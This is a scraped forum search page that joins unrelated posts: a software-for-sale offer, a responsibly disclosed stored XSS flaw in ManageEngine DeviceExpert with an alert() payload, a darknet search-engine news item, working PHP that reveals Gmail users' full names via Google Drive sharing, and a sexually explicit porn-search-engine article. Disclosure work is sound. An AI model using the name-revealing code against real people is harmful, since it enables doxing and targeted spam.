Search the Community

Vând GSA Search Engine Ranker Nu e furat e al meu, o pot dovedi pentru cei interesa?i. Pre?: 69$ paypal Dau primul userilor cu vechime ?i de încredere, dac? nu facem tranzac?ia printr-un moderator.

=============================================================================== Stored XSS Vulnerability In Manage Engine Device Expert =============================================================================== . contents:: Table Of Content Overview ======== * Title :Stored XSS Vulnerability In Manage Engine Device Expert * Author: Kaustubh G. Padwad * Plugin Homepage: http://www.manageengine.com/products/device-expert/ * Severity: HIGH * Version Affected: Version 5.9.9.0 Build: 5990 * Version Tested : Version 5.9.9.0 Build: 5990 * version patched: Separate Patch release for all version Description =========== About the Product ================= DeviceExpert is a web–based, multi vendor network change, configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices. Trusted by thousands of network administrators around the world, DeviceExpert helps automate and take total control of the entire life cycle of device configuration management. Vulnerable Parameter -------------------- * Login Name About Vulnerability ------------------- This Product is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can execute arbitrary code into Admin manage console. Once exploited, admin’s browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc. Vulnerability Class =================== Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29) Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) Steps to Reproduce: (POC) ========================= 1. After Setting up Manage engine Login to manage engine Device expert 2. Navigate to admin-->User Management-->New User 3.Put this Payload into Login Name 4.Fill the other details #####payload To Use####################### <BODY ONLOAD=alert('Hacked_ByS3curity_B3ast')> ########################################## 5. Click Save to See Stored XSS in action 6. Reload Pages to see it many times you want 7. Same can be done By CSRF also . image:: stoerdXSS.jpeg :height: 1000 px :width: 1000 px :scale: 100 % :alt: XSS POC :align: center Mitigation ========== Receved from manage engine team https://uploads.zohocorp.com/Internal_Useruploads/dnd/NetFlow_Analyzer/o_19ga51p951gblpbs1rkrm211vim1/vulnerabilities_Fix.zip Open DeviceExper.zip 1. Stop the Device Expert service. 2. Please replace AdvNCM.jar under DeviceExpert_Home/lib with the one under DeviceExpert.zip/AdvNCM.jar 3. Start the Device Expert service Change Log ========== Disclosure ========== 11-February-2015 Reported to Developer 13-February-2015 Acknodlagement from Developer 13-March-2015 Fixed by developer 16-March-2015 Requested a cve ID 21-March-2015 Public Disclosed credits ======= * Kaustubh Padwad * Information Security Researcher * kingkaustubh@me.com * https://twitter.com/s3curityb3ast * http://breakthesec.com * https://www.linkedin.com/in/kaustubhpadwad Source

There is an entire section of the Internet that you probably don’t see on daily basis, it’s called the "Darknet" or "Deep Web", where all browsing is done anonymously. About a week ago, we reported about the 'Memex' Deep Web Search Engine, a Defense Advance Research Projects Agency (DARPA) project to create a powerful new search engine that could find things on the deep web that isn't indexed by Google and other commercial search engines, but it isn't available to you and me. Now, there is another search engine that will let anyone easily search the Deep Web for large swaths of information for free, and without an application; you only need is an Internet connection. Onion.City, a new search engine for online underground markets that makes it more easier to find and buy drugs, guns, stolen credit cards directly from your Chrome, Internet Explorer or Firefox browser without installing and browsing via Tor Browser. Just two days after Memex story came to light, Virgil Griffith announced Onion.City Deep Web search engine onto the Tor-talk mailing list, that actually gives you the feel of a normal search engine, but can search the ".onion" domains on Deep Web and throw up results on your normal browser. ONION.CITY — SEARCH ENGINE FOR TOR ONION SITES Onion.City darknet search engine is powered using Tor2web proxy which enables it to access deep into the anonymous Tor network, finds ".onion" sites by aggregating the hidden marketplaces and makes them available to the normal web browser with easiest navigation. Tor Network is one of the most well-known Darknets, where web addresses on the Tor network follow the form of a random string of letters followed by the ".onion" suffix and are only accessible through the Tor browser. Online users visit and run so-called hidden services on ".onion" domains or deep web, but the way to get around the ".onion" websites is to first have a Tor browser. However, Onion City darknet search engine made it easy and effective for Internet users in order to search on the deep web from our favorite, insecure web browser. Those who aren't much familiar with the Deep Web can read our wonderful and detailed article on "What is the Deep Web? A first trip into the abyss". GRAMS — BLACK MARKET SEARCH ENGINE However, Onion.city isn't the first ever Deep Web search engine. Last year, the first search engine for online underground Black Markets, called Grams, was launched that lets anyone to easily find illegal drugs and other contraband online in an easier way ever and it's pretty fast like Google Search Engine. Such a search engine like Grams and Onion.city are mostly considered to be illegal or illicit, but not every website on the Deep Web is dubious. The Frequently Asked Questions (FAQs) on Onion.City website even provides an email address to report content that may be illegal, though it's unclear exactly what steps they’ll take. For now, leaving controversies aside, Onion.city seems to be a nice and effective Deep Web search engine for providing a means for regular web users to search things they would otherwise have to work a little harder to find. Source

overview on 12/09/14 i discovered a method of revealing the full and/or display names associated with gmail accounts via maps engine, whether or not those accounts are associated with google plus, which renders said information public. i immediately submitted my findings to google’s vulnerability rewards program and began correspondence with their security team. at some point during this time, i discovered a nearly identical vulnerability in google drive, and held it as an ace up my sleeve while awaiting feedback on the maps engine leak. the google drive leak differs in a few ways from the maps engine leak, specifically in that it doesn’t deploy an email to the target – potentially informing him or her that something is afoot, and is what the live proof of concept and open source code are based upon. here it is in action with a non-g+ account: <11:35 pm est update> it has recently come to light that this not only works on google accounts, but *some* hotmails, yahoos and others as well. here’s a small excerpt of what i just sent over to google’s security team: additionally, adrian suggested the possibility of: so thanks to him and marcus from the 2600 group for helping me try to wrap my head around this, and this tweet, which poses an excellent question: as well as for providing some suggested reading material for the guys on google’s security team: </11:35 pm est update> timeline of events 12/09/14: submitted vulnerability report 12/15/14: confirmation that the issue exists 12/16/14: google employee confirms that maps engine is “too chatty” and files a bug report 01/17/15: i am informed the issue “doesn’t represent a security vulnerability” 01/20/15: google publicly announces its plans to deactivate maps engine and restricts new signups 01/20/15: it is discovered that other email services, not just gmail, are vulnerable. google security team notified via email click here for a live poc demo of the gmail full name revealer now obviously you aren’t going to reveal a target’s full name every time. there are a few factors to consider; one of which being that not everyone uses their actual full name when signing up for something on the internet, another being that gmail account’s must be 6 characters long, and i’m sure a few others i’m not accounting for. sometimes you’ll retrieve null results, but most of the time what you’ll end up with is either a user-set display name, or in most cases, the first and last name the target entered while signing up for the account as seen here: and here‘s the source code. you may quickly notice php isn’t my native programming language, so feel free to make revisions. i’d love to see them. <?php $targetEmail = 'target@gmail.com'; require_once "google-api-php-client/src/Google/Client.php"; require_once "google-api-php-client/src/Google/Service/Drive.php"; require_once "google-api-php-client/src/Google/Auth/AssertionCredentials.php"; $cScope = 'https://www.googleapis.com/auth/drive'; $cClientID = '[clientid]'; $cClientSecret = '[clientsecret]'; $cRedirectURI = '[redirecturi]'; $cAuthCode = ''; if(isset( $_GET['code'])) { $cAuthCode = $_GET['code']; } if (!($cAuthCode) == "null") { $rsParams = array( 'scope' => $cScope, 'state' => 'security_token', 'redirect_uri' => $cRedirectURI, 'response_type' => 'code', 'client_id' => $cClientID, 'access_type' => 'offline', 'approval_prompt' => 'force' ); $cOauthURL = 'https://accounts.google.com/o/oauth2/auth?' . http_build_query($rsParams); header('Location: ' . $cOauthURL); exit(); } elseif (empty($cRefreshToken)) { $authURL = "https://www.googleapis.com/oauth2/v3/token?code=" . $cAuthCode . "&client_id=" . $cClientID . "&client_secret=" . $cClientSecret . "&redirect_uri=" . $cRedirectURI . "&grant_type=authorization_code"; $ch = curl_init(); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_URL, $authURL); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, ""); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $output = curl_exec($ch); curl_close($ch); $oToken = json_decode($output); $accessToken = $oToken->access_token; $refreshToken = $oToken->refresh_token; } $createURL = "https://www.googleapis.com/drive/v2/files"; $ch = curl_init(); curl_setopt($ch, CURLOPT_HTTPHEADER, array( 'Content-Type: application/json', "Authorization: Bearer " . $accessToken )); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST'); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_URL, $createURL); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, "{\"title\": \"revealyourself1\"}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $output = curl_exec($ch); curl_close($ch); $oToken = json_decode($output); $fileID = $oToken->id; $compileJSON = array("role" => "writer","type" => "user","value" => $targetEmail,"emailAddress" => $targetEmail); $jsonPostData = json_encode($compileJSON); $addUser = "https://www.googleapis.com/drive/v2/files/" . $fileID . "/permissions?sendNotificationEmails=false"; $ch = curl_init(); curl_setopt($ch, CURLOPT_HTTPHEADER, array( 'Content-Type: application/json', "Authorization: Bearer " . $accessToken )); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST'); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_URL, $addUser); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $jsonPostData); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $output = curl_exec($ch); curl_close($ch); if (strpos($output,'error') !== false) { echo 'error feedback from google:<br><br>' . $output; } else { $oToken = json_decode($output); $fullName = $oToken->name; echo $targetEmail . ' is ' . $fullName; } ?> reflection this clearly isn’t, by any stretch of the imagination, the hack of the century. however, i do think that the significance of this issue, as well as my efforts to correct it, were marginalized by google. i believe many users signing up for a simple webmail account aren’t comfortable with their full names being readily accessible to the public, and ultimately my goal here is to see google make a more concentrated effort to protect their user’s privacy. i would like to see these two security vulnerabilities patched before troublemakers start running wild d0xing each other and spammers utilize them to compile name,email .csv data for highly targeted unsolicited email campaigns. i also think that these are two instances of information leaks, which google’s vulnerability rewards program classifies as being valued at $5,000 to $10,000 a pop, and i classify as information leaks based on google’s privacy policy’s indication of their user’s names being “personal information.” in any case, i won’t be working with google’s security team in the future unless they, at least in this particular instance, reevaluate what constitutes a security vulnerability. stay tuned for updates. Source: http://mcsheehan.com/?p=15

I've found this video, and is very useful for all of us who doesn't know about startpage secure engine, the best alternative to google:

Am zis sa bag stirea aici ca nu prea e de securitate.... By EJ Dickson on September 15, 2014 This article contains sexually explicit material that may be NSFW. Everyone has a favorite search engine for finding porn. But it’s a well-established fact that thanks to certain tech juggernauts imposing restrictions on adult content in search results, some search engines are just better at finding smut than others (*cough Bing cough*). If you have an ultra-high-powered government job, or you share a computer with a roommate who’s studying for the clergy, there’s always a concern that your late-night searches for busty Brazilian teens will show up in your search history. But apparently, you won’t have to worry about that happening with Boodigo, which is being touted as “the world’s first adult search engine.” Unlike other search engines, which make it intentionally difficult for users to access naughtier content, Boodigo “is designed to find ‘real’ adult sites and give top listings to them,” Colin Rowntree, one of Boodigo’s founders, said in a press release. “That avoids the problem of going to Google, searching for, say, ‘blowjob’, and getting the first multiple results pages of Wikipedia articles, women’s magazine how-to guides, etc., before the online user can actually find a link to sites that focus on blowjob photos and movies.” Boodigo isn’t actually the first search engine designed exclusively for porn: There’s also Search.xxx, an adult-friendly mockup of Google, as well as PornMD. But unlike PornMD, which will take you directly to free tube sites (which many performers in the adult industry have claimed encourages the spread of illegal piracy), Boodigo is marketing itself as a search engine for the ethical porn aficionado: The site directs you to individual performer and studio pay sites, instead of sites that might feature illegally posted or unlicensed content. Curious about the potential of a porn search engine that encourages people to actually pay for porn, I decided to give Boodigo a whirl. I started with an easy one: adult performer and Duke porn star Belle Knox, whom I met at her birthday party earlier this year. Here’s what came up when I searched for Knox on Google, sans SafeSearch settings: And here’s Knox on Boodigo: These search results either link to Belle’s entries on various porn databases, or to pay sites that feature her work, where you have to again search for her there. (Not all of them even do: Baremaidens.com, for instance, which shows up in a Boodigo search, features performers named “Bailey Knox” and “Natasha Belle,” but not the Duke porn star herself.) Next, I tried “eel anal porn,” based on an unnamed coworker’s suggestion that a film called Eels Out the Ass Like Whoa is a real thing. When I searched on Google, the clip immediately came up in the second search result, for better or for worse: Sadly, that was not the case on Boodigo. Apparently, the site had some trouble differentiating between the specific niche I was searching for (i.e. eel anal porn), and good old-fashioned anal porn, which in the world of porn searches is kind of like being unable to tell the difference between a Burgundy and a Bordeaux and just saying, "meh, they're both red wines." Boodigo also pulled up a performer named “Anal Alan,” whom I had never heard of but apparently has an empty YouTube channel. (Given that his height is listed as “0,” I guess it’s no surprise that his career never took off.) Because “eel anal porn” is admittedly fairly obscure, I decided to search for just “anal.” My luck was a little better with Boodigo this time around: Not so much with Google, however, which pulled up Wikipedia and the r/anal subreddit in lieu of actual anal porn: That's like asking for a glass of Bordeaux and getting a warm can of 7-Up instead. Shame on you, Google. Shame. On. You. So, OK, if it wants to go around calling itself the world’s first porn search engine, Boodigo obviously needs to work out a few kinks first. But in light of Google’s recent AdWords policy change restricting adult content advertising, many porn performers and producers have expressed concern that tech giants are increasingly censoring adult content, which might lead to them eliminating adult content from their platforms altogether. If that actually ever happens, a search engine like Boodigo won’t just be helpful to porn aficionados looking for a secure, anonymous, cookie-free J.O. experience—it’ll be necessary. Let’s just hope for the sake of eel anal enthusiasts that it tweaks its algorithms a bit first. Photo via morgueFile Archive (PD) Source: Can the 'world's first porn search engine' beat Google?